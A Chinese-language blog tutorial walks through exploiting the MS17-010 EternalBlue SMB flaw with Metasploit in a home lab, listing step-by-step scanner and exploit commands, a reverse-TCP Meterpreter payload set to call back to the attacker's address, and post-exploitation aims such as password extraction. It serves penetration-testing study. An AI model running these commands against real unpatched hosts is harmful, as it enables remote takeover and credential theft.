实战-使⽤msf渗透攻击ms17-010超级详细简单~

实验内网渗透环境

Linux KALI:攻击机 192.168.40.171

win7 虚拟机:靶机 192.168.40.175

在此声明文章仅供相互学习参考,严禁利用于违法犯忌的事,任何事故自行承担!!

MSF(Metasploit Framework)是一种广泛使用的开源渗透测试工具,可以用来发现和利用系统中的安全漏洞。‌ MSF提供了一个全面的平台,用于执行安全测试、漏洞利用和后渗透测试。通过使用MSF,安全专业人员可以模拟黑客攻击,以评估系统的安全性并找出潜在的弱点。

利用的是:共享文件应用漏洞;分为:扫描阶段--攻击阶段--payloads--操作

        永恒之蓝(EternalBlue):

                 是漏洞利用程序(网络攻击工具),永恒之蓝利用windows系统的SMB漏洞可以获取系统最高权限。

        SMB协议(Server Message Block):

                它能被用于Web连接和客户端与服务器之间的信息沟通,SMB通过windows的共享文件应用端口号(主要通信端口:445)进行信息沟通。

MS17-010(永恒之蓝漏洞):

利用SMB协议的缓冲区溢出漏洞,通过覆盖其他内存区域,实现远程的命令注入。

    扫描阶段:kali攻击机通过445端口号向windows靶机发送TCP报文,扫描查看是否存在ms17-010漏洞
    攻击阶段:kali通过共享文件应用端口号445,对win7(靶机)发送SMB报文进行攻击,建立连接
    payloads(建立连接):win7(靶机)进行监控的数据包通过444端口号传输到kali(攻击机)中,建立稳定连接 ---攻击载荷,可返回shell(bash或cmd),进行程序注入等
    在攻击机进行靶机操作:对靶机进行想要进行的一系列操作,eg、对靶机进行增删改查各种信息等操作

payload 模块:建立连接,攻击载荷 ,其作用:

        木马病毒将shell封装在(实现配置好的)通信协议数据包里,再返回给kali,其中payloads模块就是所使用的通信协议(通信规则),返回时就需要用这个payloads模块进行解析

        同时建立好session回话后,payloads模块还需要封装由目标机所需要执行的命令发送出

正向shell是指攻击机主动连接靶机,并取得shell。通俗点说就是靶机自己绑定某个端口,等攻击机连接后将收到的数据给bash或cmd(后文简称shell),执行结果再丢给攻击机。

        影响:恶意代码会扫描开放文件共享端口(端口号:445)的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

通过 msf 模块获取 Win7 主机远程 shell

常⽤⽅法:

msfdb run     #进⼊框架
search ms17_010     # 使⽤search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue      # 使⽤use进⼊模块
info      #使⽤info查看模块信息
set payload windows/x64/meterpreter/reverse_tcp     #设置攻击载荷
show options     #查看模块需要配置的参数
set RHOST 192.168.xxx.xxx     #设置参数
exploit / run      #攻击
后渗透阶段      #后渗透阶段

好了,我们已经了解的差不多了,开始行动!

---------------------------------------------------------------------------------------------------------------------------------

一,使⽤辅助模块进⾏漏洞扫描

1.msfdb run #进⼊msf

2.search ms17_010

二,使⽤模块,进⾏配置

1.use auxiliary/scanner/smb/smb_ms17_010     # 使⽤模块或者使⽤use 1

2.show options    # 查看配置

3.set rhosts 192.168.40.175      # 配置rhosts 受害者IP地址

三,执⾏ / 开始攻击

exploit #或者run命令执⾏攻击

注:有+号的就是可能存在漏洞的主机.

四,切换Exploit模块进⾏利⽤

(1)exploit攻击,获取目标主机shell

配置完成后开始执行 exploit [ɪkˈsplɔɪt 运用;利用;

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit ----攻击

注:如果等待没有出现 shell 提示符可以敲一下回车。

1.use exploit/windows/smb/ms17_010_eternalblue   # 使⽤攻击模块

2.show options    # 查看配置

3.set rhosts 192.168.40.175     # 设置受害者IP

4.set lhost 192.168.40.171     #设置反弹ip

5.show targets     #查看 exploit target ⽬标类型

6.run

7.无shell提示符,回车(此时直接执行都有目标主机shell)

注:攻击成功会进入meterpreter,此时输入shell进入对方的cmd,exit可退出meterpreter

### 使用 Metasploit 执行 MS17-010 漏洞用 #### 加载 EternalBlue Exploit 模块 为了针对 MS17-010 漏洞进行攻击或测试,在 Metasploit 中加载特定的 SMB 漏洞模块: ```bash msf6 > use exploit/windows/smb/ms17_010_eternalblue ``` 这一步骤选择了用于 Windows SMB 服务中的 MS17-010 漏洞——即著名的“永恒之蓝”漏洞攻击向量[^1]。 #### 设置目标和配置 Payload 一旦选定模块之后,设置目标机器的相关参数以及选择有效负载(Payload),默认情况下会选择 `windows/x64/meterpreter/reverse_tcp` 这种反向 TCP Meterpreter shell 类型的有效荷载: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target_ip> msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <local_ip> ``` 这里 `<target_ip>` 是指代存在潜在漏洞的目标主机 IP 地址,而 `<local_ip>` 则是指本地监听地址以便接收来自受害者的连接请求[^3]。 #### 验证并运行 Exploit 完成上述准备工作后,可以通过命令来检查当前设定是否合理,并最终执行实际攻击操作: ```bash msf6 exploit(windows/smb/ms17_010_etternalblue) > check msf6 exploit(windows/smb/ms17_010_eternalblue) > run ``` 需要注意的是,“check” 功能并非总是能够准确判断远程系统的脆弱性状态;因此即使返回不确定的结果也值得一试 “run”。 #### 后渗透阶段 如果成功突破,则会获得一个交互式的 Meterpreter Shell 或者其他形式的访问权限。此时可以根据具体需求进一步开展后续行动,比如文件系统浏览、密码提取等高级功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值